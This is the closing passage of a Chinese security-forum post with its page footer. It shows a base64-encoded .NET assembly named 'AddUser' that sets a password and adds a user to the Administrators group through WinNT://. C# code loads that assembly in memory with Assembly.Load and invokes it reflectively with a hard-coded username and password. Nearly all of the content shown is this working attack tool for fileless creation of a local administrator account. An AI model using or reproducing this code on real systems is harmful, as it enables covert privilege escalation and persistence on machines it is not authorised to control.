lci5leGUAU3lzdGVtLlJ1bnRpbWUuVmVyc2lvbmluZwBUb1N0cmluZwBnZXRfUGF0aABQcm9ncmFtAFN5c3RlbQBnZXRfQ2hpbGRyZW4ATWFpbgBTeXN0ZW0uUmVmbGVjdGlvbgBFeGNlcHRpb24ATGlzdEdyb3VwAEFkZFVzZXIASUVudW1lcmF0b3IAR2V0RW51bWVyYXRvcgAuY3RvcgBTeXN0ZW0uRGlhZ25vc3RpY3MAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMAU3lzdGVtLkRpcmVjdG9yeVNlcnZpY2VzAERlYnVnZ2luZ01vZGVzAENvbW1pdENoYW5nZXMARGlyZWN0b3J5RW50cmllcwBhcmdzAERucwBTeXN0ZW0uQ29sbGVjdGlvbnMAQ29uY2F0AE9iamVjdABTeXN0ZW0uTmV0AGdldF9DdXJyZW50AFRlc3QATW92ZU5leHQARGlyZWN0b3J5RW50cnkAb3BfRXF1YWxpdHkAAAARVwBpAG4ATgBUADoALwAvAAATLABjAG8AbQBwAHUAdABlAHIAAA0tAC0AbABpAHMAdAABBS0AdQABBS0AcAABC0cAcgBvAHUAcAAACXUAcwBlAHIAABdTAGUAdABQAGEAcwBzAHcAbwByAGQAAB1BAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAAAtnAHIAbwB1AHAAAAdBAGQAZAAAB1sAKwBdAAAhIABDAHIAZQBhAHQAZQBkACAAUwB1AGMAYwBlAHMAcwAAKyAAYQBkAGQAIAB0AG8AIABnAHIAbwB1AHAAIABTAHUAYwBjAGUAcwBzAAAAQ3REeVsMNk+j95CnDRvIGAAEIAEBCAMgAAEFIAEBEREEIAEBDgQgAQECBwcEDhJFDg4DAAAOBgADDg4ODgUAAgIODgMgAA4EAAEBDggHAxJNEkUSUQQgABJhBCAAEk0DIAAcAyAAAgYHAhJFEkUGIAISRQ4OBiACHA4dHAi3elxWGTTgiQiwP19/EdUKOgUAAQEdDgYAAgEOEkUHAAMBDg4SRQgBAAgAAAAAAB4BAAEAVAIWV3JhcE5vbkV4Y2VwdGlvblRocm93cwEIAQACAAAAAAAMAQAHQWRkVXNlcgAABQEAAAAACQEABEhvbWUAABsBABZDb3B5cmlnaHQgwqkgSG9tZSAyMDIyAAApAQAkNTExNmJhN2ItYWQyZi00ZTkzLWI5MjgtZWU2YmVlNzdiNWM3AAAMAQAHMS4wLjAuMAAATQEAHC5ORVRGcmFtZXdvcmssVmVyc2lvbj12NC43LjIBAFQOFEZyYW1ld29ya0Rpc3BsYXlOYW1lFC5ORVQgRnJhbWV3b3JrIDQuNy4yAAAAAAAAe6wIgQAAAAACAAAAagAAAFgtAABYDwAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAFJTRFNxYdKki+kwSKDFvPvj8OhaAQAAAEM6XFVzZXJzXEFkbWluaXN0cmF0b3JcRGVza3RvcFxjI1xBZGRVc2VyXEFkZFVzZXJcQWRkVXNlclxvYmpcUmVsZWFzZVxBZGRVc2VyLnBkYgDqLQAAAAAAAAAAAAAELgAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA9i0AAAAAAAAAAAAAAABfQ29yRXhlTWFpbgBtc2NvcmVlLmRsbAAAAAAAAAD/JQAgQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACABAAAAAgAACAGAAAAFAAAIAAAAAAAAAAAAAAAAAAAAEAAQAAADgAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAEAAQAAAGgAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAKwDAACQQAAAHAMAAAAAAAAAAAAAHAM0AAAAVgBTAF8AVgBFAFIAUwBJAE8ATgBfAEkATgBGAE8AAAAAAL0E7/4AAAEAAAABAAAAAAAAAAEAAAAAAD8AAAAAAAAABAAAAAEAAAAAAAAAAAAAAAAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8AAAAAACQABAAAAFQAcgBhAG4AcwBsAGEAdABpAG8AbgAAAAAAAACwBHwCAAABAFMAdAByAGkAbgBnAEYAaQBsAGUASQBuAGYAbwAAAFgCAAABADAAMAAwADAAMAA0AGIAMAAAABoAAQABAEMAbwBtAG0AZQBuAHQAcwAAAAAAAAAqAAUAAQBDAG8AbQBwAGEAbgB5AE4AYQBtAGUAAAAAAEgAbwBtAGUAAAAAADgACAABAEYAaQBsAGUARABlAHMAYwByAGkAcAB0AGkAbwBuAAAAAABBAGQAZABVAHMAZQByAAAAMAAIAAEARgBpAGwAZQBWAGUAcgBzAGkAbwBuAAAAAAAxAC4AMAAuADAALgAwAAAAOAAMAAEASQBuAHQAZQByAG4AYQBsAE4AYQBtAGUAAABBAGQAZABVAHMAZQByAC4AZQB4AGUAAABQABYAAQBMAGUAZwBhAGwAQwBvAHAAeQByAGkAZwBoAHQAAABDAG8AcAB5AHIAaQBnAGgAdAAgAKkAIABIAG8AbQBlACAAMgAwADIAMgAAACoAAQABAEwAZQBnAGEAbABUAHIAYQBkAGUAbQBhAHIAawBzAAAAAAAAAAAAQAAMAAEATwByAGkAZwBpAG4AYQBsAEYAaQBsAGUAbgBhAG0AZQAAAEEAZABkAFUAcwBlAHIALgBlAHgAZQAAADAACAABAFAAcgBvAGQAdQBjAHQATgBhAG0AZQAAAAAAQQBkAGQAVQBzAGUAcgAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADEALgAwAC4AMAAuADAAAAA4AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMQAuADAALgAwAC4AMAAAALxDAADqAQAAAAAAAAAAAADvu788P3htbCB2ZXJzaW9uPSIxLjAiIGVuY29kaW5nPSJVVEYtOCIgc3RhbmRhbG9uZT0ieWVzIj8+DQoNCjxhc3NlbWJseSB4bWxucz0idXJuOnNjaGVtYXMtbWljcm9zb2Z0LWNvbTphc20udjEiIG1hbmlmZXN0VmVyc2lvbj0iMS4wIj4NCiAgPGFzc2VtYmx5SWRlbnRpdHkgdmVyc2lvbj0iMS4wLjAuMCIgbmFtZT0iTXlBcHBsaWNhdGlvbi5hcHAiLz4NCiAgPHRydXN0SW5mbyB4bWxucz0idXJuOnNjaGVtYXMtbWljcm9zb2Z0LWNvbTphc20udjIiPg0KICAgIDxzZWN1cml0eT4NCiAgICAgIDxyZXF1ZXN0ZWRQcml2aWxlZ2VzIHhtbG5zPSJ1cm46c2NoZW1hcy1taWNyb3NvZnQtY29tOmFzbS52MyI+DQogICAgICAgIDxyZXF1ZXN0ZWRFeGVjdXRpb25MZXZlbCBsZXZlbD0iYXNJbnZva2VyIiB1aUFjY2Vzcz0iZmFsc2UiLz4NCiAgICAgIDwvcmVxdWVzdGVkUHJpdmlsZWdlcz4NCiAgICA8L3NlY3VyaXR5Pg0KICA8L3RydXN0SW5mbz4NCjwvYXNzZW1ibHk+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAwAAAAYPgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="; byte[] buffer = Convert.FromBase64String(base64str); Assembly assembly = Assembly.Load(buffer); Type type = assembly.GetType("AddUser.Test"); MethodInfo method = type.GetMethod("Add"); Object obj = assembly.CreateInstance(method.Name); string username = "tttttt"; string password = "test123.."; method.Invoke(obj, new object[] { username,password ,DE}); ``` ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/08/attach-d1d393b66013898f099510da9676ccb31f951033.png)
发表于 2022-08-17 10:18:44
阅读 ( 5775 )
分类:
安全开发
0 推荐
收藏
0 条评论
请先
登录
后评论
cca
7 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!